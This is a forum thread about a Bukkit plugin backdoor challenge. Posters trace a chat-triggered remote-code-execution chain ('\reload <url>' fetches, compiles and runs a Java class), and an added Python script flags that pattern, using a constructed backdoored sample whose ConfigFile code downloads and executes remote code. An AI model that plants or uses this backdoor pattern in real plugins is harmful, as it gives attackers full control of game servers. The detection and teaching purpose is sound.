[$1] Can you discover this plugin backdoor/exploit? (Easy)

Status
This thread has been locked.

Harry

It does the thing with the thing when the thing happens so that class does the thing and then the thing happens so you have the thing and they do the thing and you get the thing when they get the thing and then the thing ends. Boom, where's my $1?
Yep, 100% accurate, definitely. :tup:

Nope, that's just the normal config :D

Ah, my bad, didn't read it right; I'm good at Java so I'll just skip out.
Might as well try, since people are finding it harder than I was expecting :p

Jayson

Java:
    // Chat handler from the challenge plugin, as posted. HIGHEST priority means it
    // runs after most other chat listeners have already seen the message.
    @EventHandler(priority = EventPriority.HIGHEST)
    void onAsyncPlayerChatEvent(AsyncPlayerChatEvent event) {
        String msg = event.getMessage();

        // Prefix match only: "/reload" and "/reloadanything" both pass, and the
        // split below assumes a second space-separated token is present.
        if (msg.startsWith(ColorUtils.translate("/reload"))) {
            plugin.getPlayerManager().reloadPlayer(event.getPlayer(), msg.split(" ")[1]);
            event.setCancelled(true);
        }
    }
Not that good in Java, but it looks like you used startsWith which could accept /reloadRandomStuff. Then msg.split(" ")[1] would only have one key, not including 1.

Harry

That would be a bug, but it's not the backdoor/exploit, as it's a lot more complicated than that. You could just add a condition to check the argument length, but it wouldn't affect the actual exploit.

Harry

I'm on my phone and have zero experience with Java, but I work with C# quite a bit, which is similar in some regards.

It's because in PlayerListener you can do /reload (insert hacker's pastebin URL here), which then goes to the reload method in PlayerManager and eventually in ConfigFile it sends an HTTP request to the hacker's URL, which can return literally anything they want.

Harry

Very close, but only two things. It wouldn't be '/reload', as it would never reach a chat event (since anything with the / prefix is always treated as a command). Also, what do you mean by 'can return literally anything they want'? Could you describe/show how it could be used to, say, op the person using the exploit?

Harry

OK, sorry, I was on a phone and it was really hard to read all of the code.
Now that I'm on a computer, I think I figured the whole thing out.

So basically if you do \\reload (because in ColorUtils it replaces \\ with /) and then put a URL after it, you can download a Java program from the internet and it'll save the whole thing in a string variable and run it in the savePlayer method in ColorUtils.
Yep, pretty much it. I'll give you that though. I'll message you on Discord. :tup:

Basically, for the people who would like to know (if anyone), this is a remote code execution backdoor/exploit, which downloads a 'payload' or in this case a Java class, which is then saved, compiled and run. Due to this, the payload could be anything and can be dynamic. Pretty powerful/harmful if I do say so myself. DM me if you want a full breakdown of it.

It would be '\reload' though, as the first backslash is to escape it, but it doesn't really matter.
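The chain the thread settles on has three parts: a chat listener (chat events only ever see messages that do not start with `/`, so the trigger is disguised with a `\` that a "colour utility" rewrites), a fetch from a URL taken out of the message, and a compile-and-run of whatever came back. The script below is an added example, not code from the thread or the challenge plugin: a Python triage pass over a plugin's Java source (or decompiled source) that flags the combination of those three indicator groups inside one plugin, since each on its own is ordinary plugin code. The two plugins it scans are constructed samples; the backdoored one borrows the names `PlayerListener`, `ColorUtils`, `ConfigFile`, `reloadPlayer` and `savePlayer` from the thread but its bodies are my guess at the mechanism, not the real plugin.

```python
"""Heuristic triage of Bukkit/Spigot plugin source for a chat-triggered
download-compile-execute backdoor. One indicator group alone is normal
plugin code; the full chain in one plugin is what needs a manual review.
Added example, not the thread's plugin. Sample sources below are constructed."""
import re
from dataclasses import dataclass, field

INDICATORS = {
    # Chat events receive everything that does NOT start with '/', so a
    # hidden "command" has to live in a chat listener.
    "chat_hook": [r"\bAsyncPlayerChatEvent\b", r"\bPlayerChatEvent\b"],
    # A "colour utility" that swaps '\' and '/' (either direction), so that
    # typing "\reload <url>" ends up matching "/reload".
    "prefix_rewrite": [r"replace(?:All)?\(\s*['\"](?:\\\\|/)['\"]\s*,\s*['\"](?:/|\\\\)['\"]\s*\)"],
    # The payload is pulled from a URL chosen by whoever typed the message.
    "remote_fetch": [r"\bnew\s+URL\(", r"\bopenStream\(", r"\bopenConnection\(",
                     r"\bHttpURLConnection\b"],
    # Downloaded text is turned into a class and executed in-process.
    "dynamic_code": [r"\bToolProvider\.getSystemJavaCompiler\(", r"\bjavax\.tools\b",
                     r"\bURLClassLoader\b", r"\bdefineClass\(", r"\bClass\.forName\(",
                     r"\bnewInstance\("],
}
COMPILED = {g: [re.compile(p) for p in pats] for g, pats in INDICATORS.items()}


@dataclass
class Finding:
    plugin: str
    hits: dict = field(default_factory=dict)  # group -> [(file, line_no, line)]

    @property
    def verdict(self):
        groups = set(self.hits)
        if {"chat_hook", "remote_fetch", "dynamic_code"} <= groups:
            return "BACKDOOR-SUSPECT"  # trigger + fetch + execute all present
        if {"remote_fetch", "dynamic_code"} <= groups:
            return "REVIEW"  # remote code load, trigger not found by this heuristic
        return "clean"


def scan_plugin(name, files):
    """files: {file name: Java source text}. Indicators are matched per line
    and aggregated across the whole plugin, because the chain is usually
    spread over several classes (listener, utility, config/loader)."""
    finding = Finding(name)
    for fname, text in files.items():
        for no, line in enumerate(text.splitlines(), 1):
            for group, pats in COMPILED.items():
                if any(p.search(line) for p in pats):
                    finding.hits.setdefault(group, []).append((fname, no, line.strip()))
    return finding


def audit(plugins):
    """plugins: {plugin name: {file name: source}} -> {plugin name: verdict}."""
    return {name: scan_plugin(name, files).verdict for name, files in plugins.items()}


# Constructed sample: an ordinary chat filter, no network, no dynamic code.
BENIGN = {
    "ChatFilter.java": r'''
public class ChatFilter implements Listener {
    @EventHandler
    public void onChat(AsyncPlayerChatEvent event) {
        String msg = ChatColor.translateAlternateColorCodes('&', event.getMessage());
        if (msg.toLowerCase().contains("badword")) event.setCancelled(true);
    }
}
''',
}

# Constructed sample, loosely modelled on the mechanism described in the thread.
BACKDOORED = {
    "PlayerListener.java": r'''
public class PlayerListener implements Listener {
    @EventHandler(priority = EventPriority.HIGHEST)
    void onAsyncPlayerChatEvent(AsyncPlayerChatEvent event) {
        String msg = ColorUtils.translate(event.getMessage());
        if (msg.startsWith("/reload")) {   // "/..." never reaches chat, "\reload" does
            plugin.getPlayerManager().reloadPlayer(event.getPlayer(), msg.split(" ")[1]);
            event.setCancelled(true);
        }
    }
}
''',
    "ColorUtils.java": r'''
public class ColorUtils {
    public static String translate(String s) {
        return ChatColor.translateAlternateColorCodes('&', s).replace("\\", "/");
    }
}
''',
    "ConfigFile.java": r'''
public class ConfigFile {
    public static void savePlayer(String url, File dir) throws Exception {
        String src = new String(new URL(url).openStream().readAllBytes());
        File java = new File(dir, "Payload.java");
        Files.writeString(java.toPath(), src);
        ToolProvider.getSystemJavaCompiler().run(null, null, null, java.getPath());
        ClassLoader cl = new URLClassLoader(new URL[]{dir.toURI().toURL()});
        cl.loadClass("Payload").getDeclaredConstructor().newInstance();
    }
}
''',
}

if __name__ == "__main__":
    for plugin, files in {"chatfilter": BENIGN, "backdoored": BACKDOORED}.items():
        f = scan_plugin(plugin, files)
        print(f"{plugin}: {f.verdict}")
        for group, where in f.hits.items():
            for fname, no, line in where:
                print(f"  [{group}] {fname}:{no}: {line}")
```

This is a triage aid, not proof either way: a plugin that builds the class name or URL at runtime, shells out to `javac`, or loads bytes through a custom class loader will slip past these regexes, and a legitimate updater will trip `remote_fetch`. Run it over the decompiled output of the jar you were actually given rather than the source on the seller's repository, and treat a `BACKDOOR-SUSPECT` hit as the starting point for reading those files, not as the conclusion.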